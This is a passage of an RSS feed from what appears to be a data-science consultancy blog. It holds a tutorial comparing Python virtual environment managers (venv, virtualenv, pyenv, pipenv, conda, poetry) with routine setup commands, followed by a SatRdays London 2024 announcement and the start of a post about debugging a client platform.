&lt;h2 id="virtual-environment-managers"&gt;Virtual environment managers&lt;/h2&gt;
&lt;p&gt;There are a lot of virtual environment managers out there for Python. Below we will give a basic overview of some on the most popular options and share some useful links for more in-depth information.&lt;/p&gt;
&lt;p&gt;Note that some of these tools double as &lt;em&gt;package&lt;/em&gt; managers. For more on this, check out our recent blog on &lt;a href="https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/" rel="external"&gt;Python package managers&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="venv"&gt;venv&lt;/h3&gt;
&lt;p&gt;Python&amp;rsquo;s standard library includes an easy-to-use, lightweight virtual environment module called venv. To create a virtual environment called &amp;ldquo;myenv&amp;rdquo;, you can run the following command:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will generate a folder within the current working directory called &amp;ldquo;myenv/&amp;rdquo; (you can call it whatever you like), which will be used to activate the virtual environment and store any packages that are installed into the environment.&lt;/p&gt;
&lt;p&gt;To activate the environment on Windows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;myenv\Scripts\activate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;On macOS and Linux, you have to &lt;code&gt;source&lt;/code&gt; the activation script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source myenv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once activated, the &lt;code&gt;pip install &amp;lt;pkg&amp;gt;&lt;/code&gt; command will now install packages into the virtual environment, keeping them separate from the user&amp;rsquo;s &lt;em&gt;system&lt;/em&gt; environment. If you want to share your development environment with a colleague that&amp;rsquo;s working on the same project, you can run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip freeze &amp;gt; requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will create a file called &amp;ldquo;requirements.txt&amp;rdquo; containing a list of installed Python packages and their version numbers. Your colleague can then install these dependencies into their environment by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install -r requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When you are finished with the environment, it can be deactivated by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;deactivate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To delete the envionment outright, simply delete the &amp;ldquo;myenv/&amp;rdquo; folder (or whatever you called it).&lt;/p&gt;
&lt;h3 id="virtualenv-and-virtualenvwrapper"&gt;virtualenv and virtualenvwrapper&lt;/h3&gt;
&lt;p&gt;Virtualenv is a third-party library that predates venv. If it&amp;rsquo;s installed with the virtualenvwrapper extension library, it can provide additional commands and features like quick switching between multiple environments. Virtualenv can be installed with pip:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install virtualenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can then use the &lt;code&gt;virtualenv&lt;/code&gt; command to create a virtual environment from the command line:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;virtualenv myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Activating and deactivating the environment is similar to venv. With a Unix shell the commands would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source myenv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;deactivate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and packages can again be installed or uninstalled using pip.&lt;/p&gt;
&lt;p&gt;Virtualenvwrapper is a set of extensions for virtualenv that simplify the management of multiple virtual environments. It provides commands to create, delete, and switch between virtual environments easily without having to explicitly state the environment file path. To get started with virtualenvwrapper, you&amp;rsquo;ll first need to install it using pip:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install virtualenvwrapper
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then need to add the code below to the shell startup file (&lt;code&gt;~/.bashrc&lt;/code&gt;,&lt;code&gt;~/.zshrc&lt;/code&gt;, &lt;code&gt;~/.profile&lt;/code&gt;, etc) to set the location to where the virtual environments will be stored:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Virtualenvwrapper settings:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;export &lt;span style="color:#79c0ff"&gt;WORKON_HOME&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;$HOME&lt;/span&gt;/.virtualenvs
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source ~/.local/bin/virtualenvwrapper.sh
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;em&gt;Note that these commands are specific to the Unix shell. Windows users should investigate the &lt;a href="https://pypi.org/project/virtualenvwrapper-win/" rel="external"&gt;virtualenvwrapper-win package&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In a new shell, you can now create a virtual environment and activate it as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkvirtualenv myenv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;workon myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Virtualenvwrapper streamlines the management of virtual environments, making it especially useful when working on multiple Python projects simultaneously.&lt;/p&gt;
&lt;h3 id="pyenv"&gt;pyenv&lt;/h3&gt;
&lt;img src="barbie_python_version.png" alt="A sketch of a pink house with three dressed up Python logos at the windows with different Python version numbers underneath each." style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;As well as different outfits and accessories for Barbie, there are different iterations of Barbie herself: Marine Biologist Barbie and Art Teacher Barbie to name a few! Python also comes in different versions, and there are many occasions where having multiple Python installations on the same machine can be useful:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You may have upgraded to Python 3.11 but still need Python 3.8 to run some old legacy code.&lt;/li&gt;
&lt;li&gt;Your colleagues may be using an older version of Python for a project that you&amp;rsquo;re working on, and switching to that version to test and debug the project code would be useful.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pyenv is a tool that allows you to easily switch between multiple Python versions on your system. It also facilitates installing different Python versions and supports creating virtual environments for specific Python versions using virtualenv.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://github.com/pyenv/pyenv#installation" rel="external"&gt;GitHub documentation&lt;/a&gt; provides OS-specific instructions for installing pyenv on your machine. Once installed, you can try adding an older Python version using the &lt;code&gt;pyenv install&lt;/code&gt; command and then create a virtual environment for that version called &amp;ldquo;myenv/&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pyenv install 3.8.6
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pyenv virtualenv 3.8.6 myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can activate the environment by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pyenv activate myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and install packages into the environment using pip.&lt;/p&gt;
&lt;p&gt;This is a great way to organise Python projects that not only require different packages but also use specific Python releases. And there is a lot more that you can do with pyenv, like specifying the Python version globally or in the current directory. Note, however, that there are some common pitfalls to be wary of when using pyenv:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It&amp;rsquo;s easy to think that you&amp;rsquo;re using your system Python installation when really you&amp;rsquo;re working with an older version through pyenv.&lt;/li&gt;
&lt;li&gt;Be cautious when working with package managers like pip and poetry, which may be installing packages to your system Python installation rather than to the current pyenv version.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We recommend checking out the &lt;a href="https://github.com/pyenv/pyenv" rel="external"&gt;pyenv documentation&lt;/a&gt; and this &lt;a href="https://towardsdatascience.com/managing-virtual-environment-with-pyenv-ae6f3fb835f8" rel="external"&gt;useful blog post&lt;/a&gt; for more information.&lt;/p&gt;
&lt;h3 id="pipenv"&gt;Pipenv&lt;/h3&gt;
&lt;p&gt;Pipenv is a popular tool for managing both Python dependencies and virtual environments. It combines the functionality of pip and virtualenv into a single tool, and is easy to install through pip:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install pipenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It even integrates with pyenv to work with specific Python versions. To create a virtual environment for Python 3.8 (assuming you have pyenv installed), you can run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv --python 3.8
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This automatically sets up a &amp;ldquo;Pipfile&amp;rdquo; within the current folder to manage project dependencies. You can then activate the environment and install packages into the environment using &lt;code&gt;pipenv&lt;/code&gt; commands:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv shell
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv install &amp;lt;pkg&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When a package is installed using pipenv, it gets added to the Pipfile. Both the package and its dependencies are also stored in a &amp;ldquo;Pipfile.lock&amp;rdquo; file with the exact version numbers. These files can be shared with a colleague, who can then duplicate the environment on their machine by running &lt;code&gt;pipenv install&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For more information about pipenv, Pipfiles and all of pipenv&amp;rsquo;s commands you can take a look at the &lt;a href="https://pipenv.pypa.io/en/latest/" rel="external"&gt;official website&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="conda"&gt;conda&lt;/h3&gt;
&lt;p&gt;Conda is a cross-platform package and environment manager primarily used in data science and scientific computing. It allows you to create isolated environments with different Python versions and libraries.&lt;/p&gt;
&lt;p&gt;Conda is included as part of the &lt;a href="https://anaconda.org/" rel="external"&gt;Anaconda&lt;/a&gt; distribution. The fastest way to obtain it is by installing the Miniconda distribution, which acts as a smaller version of Anaconda that includes conda and Python. You can check out the installation instructions in our &lt;a href="https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/" rel="external"&gt;previous blog&lt;/a&gt; for more info.&lt;/p&gt;
&lt;p&gt;By default, you will be working in the conda &amp;ldquo;base&amp;rdquo; environment. To create a new environment called &amp;ldquo;myenv&amp;rdquo; with Python version 3.8:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda create --name myenv &lt;span style="color:#79c0ff"&gt;python&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;3.8
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can then activate the environment by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda activate myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and deactivate the environment by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda deactivate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To install packages into the currently-active environment, you should use the &lt;code&gt;conda install&lt;/code&gt; command. For example, NumPy and Pandas can be installed by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda install numpy pandas
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When you install packages into a conda environment, the package source files are retained inside a package cache folder within the conda installation directory. This allows you to quickly install the same package across multiple environments without having to perform multiple downloads.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s possible to export your conda environment to a YAML file which can then be shared with a colleague:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda env export &amp;gt; environment.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Your colleague can add the environment to their machine by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;conda env create -f environment.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For this to work, both you and your colleague need to have conda installed. Conda can also be used for R and other languages, and downloads its packages from secure repositories that are maintained by the community. For more on conda, check out the &lt;a href="https://docs.conda.io/projects/conda/en/stable/" rel="external"&gt;official documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="poetry"&gt;Poetry&lt;/h3&gt;
&lt;p&gt;Poetry is a modern dependency management and packaging tool for Python projects. It not only creates virtual environments but also simplifies the management of dependencies and project packaging.&lt;/p&gt;
&lt;p&gt;Check out our &lt;a href="https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/" rel="external"&gt;previous blog&lt;/a&gt; for installation instructions. To create a new poetry project, run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry new myproject
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This initialises a project in the &amp;ldquo;myproject/&amp;rdquo; folder and automatically sets up a virtual environment for it. To add a package you can run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry add &amp;lt;pkg&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To activate the virtual environment, run the following command from within the myproject/ folder:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;poetry shell
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When you install packages these are added to a &amp;ldquo;pyproject.toml&amp;rdquo; file. There is also a &amp;ldquo;poetry.lock&amp;rdquo; file which lists all dependencies plus all of &lt;em&gt;their&lt;/em&gt; dependencies with the exact versions. By sharing the project folder and files with a colleague, they can run &lt;code&gt;poetry install&lt;/code&gt; within the folder to duplicate the environment on their machine.&lt;/p&gt;
&lt;p&gt;We highly recommend poetry if you&amp;rsquo;re starting on a new Python project from scratch. It helps with not only the environment management, but also installing the project dependencies and organising the project folder. It can even be used to package your project and publish it to the &lt;a href="https://pypi.org/" rel="external"&gt;Python Package Index (PyPI)&lt;/a&gt; if you want to make it publicly-available. Check out the excellent &lt;a href="https://python-poetry.org/docs/" rel="external"&gt;documentation&lt;/a&gt; for more info.&lt;/p&gt;
&lt;h2 id="virtual-environments-with-jupyter"&gt;Virtual environments with Jupyter&lt;/h2&gt;
&lt;p&gt;Hopefully we&amp;rsquo;ve convinced you that virtual environments are as invaluable to Python development as Barbie&amp;rsquo;s wardrobe is to Barbie! You may now be thinking about how to incorporate some of the options presented in this blog into your development workflow.&lt;/p&gt;
&lt;img src="jupyter.png" alt="The Jupyter logo surrounded by three Python logos, each dressed up in a different outfit." style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Before we conclude, it&amp;rsquo;s worth mentioning how to add a virtual environment to Jupyter, since this is one of the most popular IDEs for developing and testing Python code. To be able to use your virtual environments within a Jupyter notebook or the JupyterLab IDE you need to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Activate your virtual environment&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Install the Python package &lt;code&gt;ipykernel&lt;/code&gt; into your virtual environment using the relevant command:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;pip install ipykernel&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;conda install ipykernel&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;etc&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Then run&lt;/p&gt;
&lt;p&gt;&lt;code&gt;python -m ipykernel install --user --name=&amp;lt;env&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;replacing &lt;code&gt;&amp;lt;env&amp;gt;&lt;/code&gt; with the name of your virtual environment.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Next time you open a Jupyter notebook or JupyterLab, you should see your environment in the list of available kernels.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Choosing the right virtual environment manager for your Python project depends on your specific requirements and preferences. Each of the tools discussed in this post has its own strengths and use cases as summarised by the table below:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Environment manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Quick/easy installation&lt;/th&gt;
&lt;th style="text-align: center"&gt;Package manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Quick multi-environment switching&lt;/th&gt;
&lt;th style="text-align: center"&gt;Python version manager&lt;/th&gt;
&lt;th style="text-align: center"&gt;Multi-language support&lt;/th&gt;
&lt;th style="text-align: center"&gt;Packaging and publishing to PyPI&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;venv&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;virtualenv&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;pyenv&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;pipenv&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;conda&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌*&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;poetry&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;td style="text-align: center"&gt;❌&lt;/td&gt;
&lt;td style="text-align: center"&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div style="text-align: right"&gt; * publishes to conda channels &lt;/div&gt;
&lt;p&gt;Ultimately, the key is to ensure that your Python projects remain isolated, maintainable, and compatible with the required dependencies. Experiment with these tools and discover which one best fits your development workflow.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/</link><pubDate>Tue, 14 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://satrday-london-2024.jumpingrivers.com/" rel="external"&gt;SatRdays&lt;/a&gt; is returning to London on 27th April 2024! We&amp;rsquo;re collaborating once again with &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt; to bring SatRdays to the amazing &lt;a href="https://en.wikipedia.org/wiki/Bush_House" rel="external"&gt;Bush House&lt;/a&gt; venue, and we can&amp;rsquo;t wait to see you there. More information will be released in the coming weeks - in the meantime, check out &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKLNjt5NnVQ1RgEKeayVVv6G&amp;si=tCFY7hjvwdnC89T1" rel="external"&gt;the recordings of last year&amp;rsquo;s talks&lt;/a&gt; for an idea of what to expect!&lt;/p&gt;
&lt;h3 id="call-for-abstracts-now-open"&gt;Call for abstracts NOW OPEN&lt;/h3&gt;
&lt;p&gt;Interested in getting involved? We&amp;rsquo;re looking to feature talks from R users from a wide range of industries, public services and academia! To apply to be a speaker, please submit your abstract (max 250 words) using &lt;a href="https://jumpingrivers.typeform.com/to/mQ756zLT" rel="external"&gt;this form&lt;/a&gt; by 17th January 2023.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-r-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sluggish system or client code?</title><link>https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/</link><pubDate>Thu, 02 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Over the course of several weeks, we worked to deploy a one-stop data science platform for data analysis and visualisation for one of our clients. This platform consisted of interconnected applications, which are the motor that enables the productivity of the data scientists sitting at the wheel.&lt;/p&gt;
